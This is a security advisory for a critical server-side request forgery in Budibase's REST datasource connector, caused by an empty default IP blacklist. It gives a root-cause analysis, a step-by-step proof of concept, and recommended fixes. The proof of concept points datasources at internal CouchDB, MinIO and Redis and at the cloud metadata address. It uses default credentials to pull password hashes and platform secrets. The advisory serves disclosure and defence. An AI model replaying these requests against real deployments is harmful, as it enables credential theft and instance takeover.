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Server-Side Request Forgery via REST Connector with Empty Default Blacklist

Critical [mjashanks](#) published [GHSA-7r9j-r86q-7g45](#) 4 days ago

Package

 **budibase** ([npm](#))

Affected versions

<= 3.30.6(Master Now)

Patched versions

3.33.4

Description

1. Summary

Field	Value
Title	SSRF via REST Connector with Empty Default Blacklist Leading to Full Internal Data Exfiltration
Product	Budibase
Version	3.30.6 (latest stable as of 2026-02-25)
Component	REST Datasource Integration + Backend-Core Blacklist Module
Vulnerability Type	CWE-918 (Server-Side Request Forgery), CWE-1188 (Initialization with Insecure Default)
Severity	Critical
CVSS 3.1 Score	9.4 — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Attack Vector	Network
Privileges Required	Low (Builder role, or QUERY WRITE for execution of pre-existing queries)
User Interaction	None

Field	Value
Affected Deployments	All self-hosted instances without explicit <code>BLACKLIST_IPS</code> configuration (believed to be the vast majority)

2. Description

A critical Server-Side Request Forgery (SSRF) vulnerability exists in Budibase's REST datasource connector. The platform's SSRF protection mechanism (IP blacklist) is rendered completely ineffective because the `BLACKLIST_IPS` environment variable is **not set by default** in any of the official deployment configurations. When this variable is empty, the blacklist function unconditionally returns `false`, allowing all requests through without restriction.

This allows any user with `Builder` privileges (or `QUERY WRITE` permission on an existing query) to create REST datasources pointing to arbitrary internal network services, execute queries against them, and fully exfiltrate the responses — including credentials, database contents, and internal service metadata.

The vulnerability is particularly severe because:

1. The CouchDB backend stores all user credentials (bcrypt hashes), platform configurations, and application data
2. CouchDB credentials are embedded in the environment variables visible to the application container
3. A successful exploit grants full read/write access to the entire Budibase data layer

3. Root Cause Analysis

3.1 Blacklist Implementation

File: `packages/backend-core/src/blacklist/blacklist.ts`

```
// Line 23-37: Blacklist refresh reads from environment variable
export async function refreshBlacklist() {
  const blacklist = env.BLACKLIST_IPS // ← reads BLACKLIST_IPS
  const list = blacklist?.split(",") || [] // ← empty array if unset
  let final: string[] = []
  for (let addr of list) {
    // ... resolves domains to IPs
  }
  blacklistArray = final // ← empty array
}

// Line 39-54: Blacklist check
```



```
export async function isBlacklisted(address: string): Promise<boolean> {
  if (!blackListArray) {
    await refreshBlacklist()
  }
  if (blackListArray?.length === 0) {
    return false // ← ALWAYS returns false when empty
  }
  // ... rest of check never executes
}
```

Problem: When `BLACKLIST_IPS` is not set (the default), `blackListArray` is initialized as an empty array, and `isBlacklisted()` unconditionally returns `false` for every URL.

3.2 Default Configuration Missing BLACKLIST_IPS

File: `hosting/.env` (official Docker Compose deployment template)

```
MAIN_PORT=10000
API_ENCRYPTION_KEY=testsecret
JWT_SECRET=testsecret
MINIO_ACCESS_KEY=budibase
MINIO_SECRET_KEY=budibase
COUCH_DB_PASSWORD=budibase
COUCH_DB_USER=budibase
REDIS_PASSWORD=budibase
INTERNAL_API_KEY=budibase
# ... (19 other variables)
# BLACKLIST_IPS is NOT present
```



No default private IP ranges (RFC1918, localhost, cloud metadata) are hardcoded as fallback.

3.3 REST Integration Blacklist Check

File: `packages/server/src/integrations/rest.ts`

```
// Line 684-686: Blacklist check before fetch
const url = this.getUrl(path, queryString, pagination, paginationValues)
if (await blacklist.isBlacklisted(url)) { // ← always false
  throw new Error("Cannot connect to URL.") // ← never reached
}
// Line 708:
response = await fetch(url, input) // ← unrestricted fetch
```



3.4 Authorization Model

Operation	Endpoint	Required Permission
Create datasource	POST /api/datasources	BUILDER (app-level)
Create query	POST /api/queries	BUILDER (app-level)
Execute query	POST /api/v2/queries/:id	QUERY WRITE (can be granted to any app user)

Route definitions:

- packages/server/src/api/routes/datasource.ts:19 → builderRoutes
- packages/server/src/api/routes/query.ts:33 → builderRoutes (create)
- packages/server/src/api/routes/query.ts:55-66 → writeRoutes with PermissionType.QUERY, PermissionLevel.WRITE (execute)

Key insight: The BUILDER role is an app-level permission, significantly lower than GLOBAL_BUILDER (platform admin). In multi-user environments, builders are expected to create app logic but are NOT expected to have access to infrastructure-level data.

4. Impact Analysis

4.1 Confidentiality — Critical

An attacker can read:

- **All CouchDB databases** (/_all_dbs)
- **User credentials** including bcrypt password hashes, email addresses (/global-db/_all_docs?include_docs=true)
- **Platform configuration** including encryption keys, JWT secrets
- **All application data** across every app in the instance
- **Internal service metadata** (MinIO storage, Redis)

4.2 Integrity — High

Through CouchDB's HTTP API (which supports PUT/POST/DELETE), an attacker can:

- **Modify user records** to escalate privileges
- **Create new admin accounts** directly in CouchDB
- **Alter application data** in any app's database
- **Delete databases** causing data loss

4.3 Availability — Medium

- **Resource exhaustion** by making the server proxy large responses from internal services
- **Database destruction** via CouchDB DELETE operations
- **Service disruption** by modifying critical configuration documents

4.4 Scope Change

The vulnerability crosses the security boundary between the Budibase application layer and the infrastructure layer. A `Builder` user should only be able to configure app-level logic, but this vulnerability grants direct access to:

- CouchDB (database layer)
- MinIO (storage layer)
- Redis (cache/session layer)
- Any other service accessible from the Docker network

5. Proof of Concept

5.1 Environment Setup

```
cd hosting/  
docker compose up -d  
# Wait for services to start  
# Create admin account via POST /api/global/users/init  
# Login to obtain session cookie
```



Tested on: Budibase v3.30.6, Docker Compose deployment with default `hosting/.env`

5.2 Step 1 — Create REST Datasource Targeting Internal CouchDB

```
POST /api/datasources HTTP/1.1  
Host: localhost:10000  
Content-Type: application/json  
Cookie: budibase:auth=<session_token>  
x-budibase-app-id: <app_id>  
  
{  
  "datasource": {  
    "name": "Internal CouchDB",  
    "source": "REST",  
    "type": "datasource",  
    "config": {  
      "url": "http://couchdb-service:5984",  
      "defaultHeaders": {}  
    }  
  }  
}
```



```
}  
}
```

Response (201 — datasource created successfully):

```
{  
  "datasource": {  
    "_id": "datasource_4530e34a8b2e423f8f8eb53e2b2cefc6",  
    "name": "Internal CouchDB",  
    "source": "REST",  
    "config": { "url": "http://couchdb-service:5984" }  
  }  
}
```

No warning, no validation error — an internal hostname is accepted without restriction.

5.3 Step 2 — Query CouchDB Version (Confirm Connectivity)

Create and execute a query to `GET /`:

```
POST /api/v2/queries/<query_id> HTTP/1.1
```

Response — Internal CouchDB data returned to the attacker:

```
{  
  "data": [{  
    "couchdb": "Welcome",  
    "version": "3.3.3",  
    "git_sha": "40afbfc7",  
    "uuid": "9cd97b58e2cef72e730a83247c377d2b",  
    "features": ["search", "access-ready", "partitioned",  
                "pluggable-storage-engines", "reshard", "scheduler"],  
    "vendor": {"name": "The Apache Software Foundation"}  
  }],  
  "code": 200,  
  "time": "44ms"  
}
```

5.4 Step 3 — Enumerate All Databases

Query: `GET /_all_dbs` with CouchDB admin credentials (from `.env`: `budibase:budibase`)

```
{  
  "data": [  
    {"value": "_replicator"},  
    {"value": "_users"},  
    {"value": "app_dev_3eeb8d7949074250ae62f206ad0b61a5"},  
  ]  
}
```

```
{
  "value": "app_dev_5135f7f368bc4701a7f163baaf22f1b7"},
  {"value": "global-db"},
  {"value": "global-info"}
]
}
```

5.5 Step 4 — Exfiltrate User Credentials and Platform Secrets

Query: `GET /global-db/_all_docs?include_docs=true&limit=20`

Headers: `Authorization: Basic YnVkaWJhc2U6YnVkaWJhc2U=` (budibase:budibase)

Response — Full user record with bcrypt hash:

```
{
  "data": [{
    "total_rows": 4,
    "rows": [
      {
        "id": "config_settings",
        "doc": {
          "_id": "config_settings",
          "type": "settings",
          "config": {
            "platformUrl": "http://localhost:10000",
            "uniqueTenantId": "23ba9844703049778d75372e720c7169_default"
          }
        }
      },
      {
        "id": "us_09c5f0a89b7f40c19db863e1aaaf90fd",
        "doc": {
          "_id": "us_09c5f0a89b7f40c19db863e1aaaf90fd",
          "email": "admin@test.com",
          "password": "$2b$10$uQ169b/H22QnV61qZE20muChFaca43yicgor1JBwwNinJwQc0iPbK",
          "builder": {"global": true},
          "admin": {"global": true},
          "tenantId": "default",
          "status": "active"
        }
      },
      {
        "id": "usage_quota",
        "doc": {
          "_id": "usage_quota",
          "quotaReset": "2026-03-01T00:00:00.000Z",
          "usageQuota": {"apps": 2, "users": 1, "creators": 1}
        }
      }
    ]
  }]
}
```

Exfiltrated data includes:

- Admin email: `admin@test.com`
- Bcrypt password hash: `$2b$10$uQl69b/H22QnV61qZE20muChFAca43yicgor1JBwwNinJwQc0iPbK`
- Role information: `builder.global: true` , `admin.global: true`
- Tenant ID, platform URL, quota information

5.6 Step 5 — Access Other Internal Services**MinIO (Object Storage):**

```
Datasource URL: http://minio-service:9000
Response: {"Code":"BadRequest","Message":"An unsupported API call..."}
Server header: MinIO
```



Confirms MinIO is reachable. With proper S3 API signatures, bucket contents could be listed and files exfiltrated.

Redis (Port Scanning):

```
Datasource URL: http://redis-service:6379
Response: "fetch failed" (Redis speaks non-HTTP protocol)
```



Different error from non-existent host → confirms service discovery capability.

Non-existent service:

```
Datasource URL: http://nonexistent-service:12345
Response: "fetch failed"
```

**5.7 Service Discovery Matrix**

Target	URL	Response	Service
CouchDB	<code>http://couchdb-service:5984/</code>	<code>{"couchdb":"welcome","version":"3.3.3"}</code>	Yes
MinIO	<code>http://minio-service:9000/</code>	XML error with <code>Server: MinIO</code> header	Yes

Target	URL	Response	
Redis	<code>http://redis-service:6379/</code>	<code>socket hang up / fetch failed</code>	Ye op
Non-existent	<code>http://nonexistent:12345/</code>	<code>fetch failed (ENOTFOUND)</code>	Ne dif er

This differential response enables internal network mapping.

6. Attack Scenarios

Scenario A: Builder User Steals All Credentials

1. User has `Builder` role for one app
2. Creates REST datasource → `http://couchdb-service:5984`
3. Queries `global-db` to get all user records with password hashes
4. Cracks bcrypt hashes offline or directly modifies user records via CouchDB PUT

Scenario B: Chained with CVE-2026-25040 (Unpatched Privilege Escalation)

1. Attacker has `Creator` role (lower than Builder)
2. Exploits CVE-2026-25040 to invite themselves as Admin
3. Now has Builder access → exploits this SSRF
4. Complete instance takeover

Scenario C: Cloud Metadata Exfiltration (AWS/GCP/Azure)

1. On cloud-hosted instances, datasource URL: `http://169.254.169.254/latest/meta-data/`
2. Retrieves IAM credentials, instance metadata
3. Pivots to cloud infrastructure

7. Affected Code Paths



```

POST /api/v2/queries/:queryId [QUERY WRITE permission]
  | packages/server/src/api/routes/query.ts:63
  ▼
packages/server/src/threads/query.ts
  | → Executes query via REST integration
  ▼
packages/server/src/integrations/rest.ts
  | Line 684: blacklist.isBlacklisted(url) → returns false (empty list)
  | Line 708: fetch(url, input) → unrestricted request
  ▼
Internal Service (CouchDB, MinIO, Redis, etc.)
  |
  ▼
Response returned to attacker via query results

```

8. Recommended Fixes

Fix 1 (Critical): Add Default Private IP Blocklist

```
// packages/backend-core/src/blacklist/blacklist.ts
```



```

const DEFAULT_BLOCKED_RANGES = [
  "127.0.0.0/8",      // localhost
  "10.0.0.0/8",      // RFC1918
  "172.16.0.0/12",   // RFC1918
  "192.168.0.0/16",  // RFC1918
  "169.254.0.0/16",  // link-local / cloud metadata
  "0.0.0.0/8",       // current network
  "::1/128",         // IPv6 localhost
  "fc00::/7",        // IPv6 private
  "fe80::/10",       // IPv6 link-local
]

export async function isBlacklisted(address: string): Promise<boolean> {
  // Always check against default blocked ranges
  // even when BLACKLIST_IPS is not configured
  const ips = await resolveToIPs(address)
  for (const ip of ips) {
    if (isInRange(ip, DEFAULT_BLOCKED_RANGES)) {
      return true
    }
  }
  // Then check user-configured blacklist
  // ...existing logic...
}

```

Fix 2 (High): Validate Datasource URLs at Creation Time

```
// packages/server/src/api/controllers/datasource.ts

async function save(ctx) {
  const { config } = ctx.request.body.datasource
  if (config?.url) {
    if (await blacklist.isBlacklisted(config.url)) {
      ctx.throw(400, "Cannot create datasource targeting internal network")
    }
  }
  // ... existing logic
}
```



Fix 3 (Medium): Add DNS Rebinding Protection

Resolve the target hostname at request time and re-check the resolved IP against the blacklist, preventing DNS rebinding attacks where the first lookup returns a public IP but the actual request resolves to an internal IP.

Fix 4 (Medium): Disable HTTP Redirects or Re-validate After Redirect

Ensure that if a response redirects to an internal IP, the redirect target is also checked against the blacklist.

9. References

- **CWE-918**: Server-Side Request Forgery — <https://cwe.mitre.org/data/definitions/918.html>
- **CWE-1188**: Initialization with Insecure Default — <https://cwe.mitre.org/data/definitions/1188.html>
- **CVE-2023-29010**: Previous Budibase SSRF (CVSS 6.5, patched in v2.4.3) — [GHSA-9xg2-9mcv-985p](https://nvd.nist.gov/vuln/detail/CVE-2023-29010)
- **CVE-2026-25040**: Budibase Privilege Escalation (unpatched) — enables chaining with this vulnerability
- **OWASP SSRF Prevention Cheat Sheet** — https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Severity

Critical 9.6 / 10

CVSS v3 base metrics

Attack vector

Network

Attack complexity

Low

Privileges required	Low
User interaction	None
Scope	Changed
Confidentiality	High
Integrity	High
Availability	None
Learn more about base metrics	

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N


CVE ID

CVE-2026-31818

Weaknesses

- ▶ CWE-918
- ▶ CWE-1188

Credits

 Moonster8282

Reporter